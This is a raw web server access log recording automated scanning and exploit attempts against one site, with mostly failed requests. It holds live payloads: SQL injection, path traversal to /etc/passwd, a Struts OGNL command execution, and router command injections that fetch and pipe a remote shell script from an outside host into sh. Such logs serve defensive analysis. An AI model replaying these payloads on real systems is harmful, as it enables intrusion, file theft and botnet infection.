205.185.122.202 - - [19/Oct/2025:14:24:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:25:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:25:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:25:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:25:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:25:14 +0530] "POST /webadmin/auth/verification.php HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:14:25:14 +0530] "POST /webadmin/auth/verification.php HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:14:25:36 +0530] "GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:25:36 +0530] "GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:25:40 +0530] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 404 1126
205.185.122.202 - - [19/Oct/2025:14:25:42 +0530] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 404 1126
205.185.122.202 - - [19/Oct/2025:14:25:57 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:25:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:26:31 +0530] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:26:31 +0530] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:26:34 +0530] "POST /website/blog/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:26:34 +0530] "POST /website/blog/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:26:34 +0530] "POST /_search HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:26:35 +0530] "POST /_search HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:27:22 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:27:22 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:27:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:27:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:27:25 +0530] "GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:27:25 +0530] "GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:27:45 +0530] "GET /?gf_page=upload HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:27:45 +0530] "GET /?gf_page=upload HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:27:47 +0530] "POST /?gf_page=upload HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:27:48 +0530] "POST /?gf_page=upload HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:28:21 +0530] "GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:28:21 +0530] "GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:28:42 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:14:28:42 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:14:28:43 +0530] "PUT /_snapshot/test HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:28:43 +0530] "PUT /_snapshot/test HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:28:45 +0530] "PUT /_snapshot/test2 HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:28:45 +0530] "PUT /_snapshot/test2 HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:28:46 +0530] "GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:14:28:47 +0530] "GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:14:29:39 +0530] "POST /cgibin/webproc HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:29:39 +0530] "POST /cgibin/webproc HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:29:40 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:29:40 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:29:48 +0530] "GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:29:48 +0530] "GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:30:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:30:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:30:51 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:30:51 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:30:52 +0530] "GET /wp-content/plugins/showbizpro/temp/update_extract/rAnvi.php HTTP/1.1" 404 1112
205.185.122.202 - - [19/Oct/2025:14:30:52 +0530] "GET /wp-content/plugins/showbizpro/temp/update_extract/rAnvi.php HTTP/1.1" 404 1112
205.185.122.202 - - [19/Oct/2025:14:31:13 +0530] "GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:31:13 +0530] "GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:31:17 +0530] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/aBbfItA5rdB0p5cN.jpg HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:31:18 +0530] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/GUXVxaRsb8fzMwXp.jpg HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:31:25 +0530] "GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:31:25 +0530] "GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:31:30 +0530] "GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:31:30 +0530] "GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:31:33 +0530] "GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:31:33 +0530] "GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:31:54 +0530] "GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:14:31:54 +0530] "GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:14:32:04 +0530] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:32:04 +0530] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:32:05 +0530] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:32:05 +0530] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:32:14 +0530] "GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:32:14 +0530] "GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:32:28 +0530] "GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:14:32:28 +0530] "GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:14:33:19 +0530] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:33:19 +0530] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:33:26 +0530] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:33:26 +0530] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:33:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:33:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:34:15 +0530] "GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:34:15 +0530] "GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:34:20 +0530] "GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:34:20 +0530] "GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:34:39 +0530] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:34:39 +0530] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:34:41 +0530] "GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:34:41 +0530] "GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:34:42 +0530] "GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:34:43 +0530] "GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:34:44 +0530] "GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:34:44 +0530] "GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:34:50 +0530] "GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:34:50 +0530] "GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:34:52 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:34:52 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:34:58 +0530] "GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:34:58 +0530] "GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:34:59 +0530] "GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:34:59 +0530] "GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:35:29 +0530] "GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:35:29 +0530] "GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1" 404 1074
204.76.203.28 - - [19/Oct/2025:14:35:39 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:14:36:06 +0530] "GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:36:06 +0530] "GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:36:38 +0530] "GET /wp-content/plugins/whizz/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:14:36:38 +0530] "GET /wp-content/plugins/whizz/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:14:36:54 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:36:54 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:37:01 +0530] "GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:37:01 +0530] "GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:38:18 +0530] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:38:18 +0530] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 1084
124.198.131.83 - - [19/Oct/2025:14:38:58 +0530] "POST /tmUnblock.cgi HTTP/1.1" 404 1020
124.198.131.83 - - [19/Oct/2025:14:38:58 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 1046
124.198.131.83 - - [19/Oct/2025:14:38:59 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 -
124.198.131.83 - - [19/Oct/2025:14:38:59 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 1012
124.198.131.83 - - [19/Oct/2025:14:38:59 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:39:01 +0530] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:39:01 +0530] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 1018
124.198.131.83 - - [19/Oct/2025:14:39:01 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:39:06 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:39:06 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:39:08 +0530] "PUT /fileserver/34HFSZeNuTNBTwtYDsLzucBgLnp.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:39:08 +0530] "PUT /fileserver/34HFSZeNuTNBTwtYDsLzucBgLnp.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:39:08 +0530] "GET /fileserver/34HFSZeNuTNBTwtYDsLzucBgLnp.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:39:09 +0530] "GET /fileserver/34HFSZeNuTNBTwtYDsLzucBgLnp.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:39:09 +0530] "GET /BSW_cxttongr.htm HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:39:09 +0530] "GET /BSW_cxttongr.htm HTTP/1.1" 404 1026
176.65.148.11 - - [19/Oct/2025:14:39:09 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:39:11 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:39:11 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
124.198.131.83 - - [19/Oct/2025:14:39:15 +0530] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 -
124.198.131.83 - - [19/Oct/2025:14:39:15 +0530] "POST /goform/setPingInfo HTTP/1.1" 404 1030
124.198.131.83 - - [19/Oct/2025:14:39:15 +0530] "POST /diagnostic.php HTTP/1.1" 404 1022
124.198.131.83 - - [19/Oct/2025:14:39:16 +0530] "GET / HTTP/1.1" 200 -
124.198.131.83 - - [19/Oct/2025:14:39:17 +0530] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 1044
124.198.131.83 - - [19/Oct/2025:14:39:17 +0530] "GET /HNAP1/ HTTP/1.1" 404 -
205.185.122.202 - - [19/Oct/2025:14:39:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:39:18 +0530] "GET / HTTP/1.1" 200 11250
124.198.131.83 - - [19/Oct/2025:14:39:18 +0530] "POST /goform/SystemCommand HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:14:39:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:39:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:39:28 +0530] "GET /wp-content/uploads/post_files/34hfqfji37gcsqhtnboy1m0ckh3.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:14:39:28 +0530] "GET /wp-content/uploads/post_files/34hfqfji37gcsqhtnboy1m0ckh3.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:14:39:29 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:39:29 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:39:30 +0530] "GET /wp-content/uploads/user_uploads/34hfqfji37gcsqhtnboy1m0ckh3.php HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:39:31 +0530] "GET /wp-content/uploads/user_uploads/34hfqfji37gcsqhtnboy1m0ckh3.php HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:39:40 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:39:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:39:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:39:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:39:53 +0530] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 1190
205.185.122.202 - - [19/Oct/2025:14:39:53 +0530] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 1190
205.185.122.202 - - [19/Oct/2025:14:39:55 +0530] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:39:55 +0530] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:41:13 +0530] "PUT /poc.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:41:13 +0530] "PUT /poc.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:41:14 +0530] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:41:14 +0530] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:41:15 +0530] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:41:15 +0530] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:41:16 +0530] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:41:16 +0530] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:41:17 +0530] "POST /invoker/readonly HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:41:17 +0530] "POST /invoker/readonly HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:41:23 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:41:23 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:41:25 +0530] "PUT /34HFQx32exzJuHo2Q7YmtD1awyH.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:41:25 +0530] "PUT /34HFQx32exzJuHo2Q7YmtD1awyH.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:41:25 +0530] "GET /34HFQx32exzJuHo2Q7YmtD1awyH.jsp HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:41:26 +0530] "GET /34HFQx32exzJuHo2Q7YmtD1awyH.jsp HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:42:17 +0530] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:42:18 +0530] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:42:32 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:42:32 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:42:54 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:42:57 +0530] "POST /maint/index.php?packages HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:42:58 +0530] "POST /maint/index.php?packages HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:42:58 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:42:59 +0530] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:42:59 +0530] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:43:36 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:43:36 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:43:42 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:43:42 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:43:44 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:43:44 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:43:46 +0530] "GET /34HFRl6P3wazzTCpWXEWCaTFstg.php%5Cx0A HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:14:43:46 +0530] "GET /34HFRl6P3wazzTCpWXEWCaTFstg.php%5Cx0A HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:14:44:11 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:44:11 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:44:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:44:37 +0530] "GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:44:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:44:38 +0530] "GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:44:40 +0530] "GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:44:40 +0530] "GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:14:50:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:58 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:50:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:51:00 +0530] "GET /hw-sys.htm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:51:02 +0530] "GET /hw-sys.htm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:51:22 +0530] "POST /clients/editclient.php?id=34HFRhA7eXxgb5BYZalzUMmRJBW&action=update HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:51:22 +0530] "POST /clients/editclient.php?id=34HFRhA7eXxgb5BYZalzUMmRJBW&action=update HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:51:25 +0530] "GET /logos_clients/34HFRhA7eXxgb5BYZalzUMmRJBW.php HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:51:26 +0530] "GET /logos_clients/34HFRhA7eXxgb5BYZalzUMmRJBW.php HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:51:32 +0530] "POST /integration/saveGangster.action HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:51:33 +0530] "POST /integration/saveGangster.action HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:51:36 +0530] "GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:51:36 +0530] "GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:51:39 +0530] "GET / HTTP/1.1" 200 11250
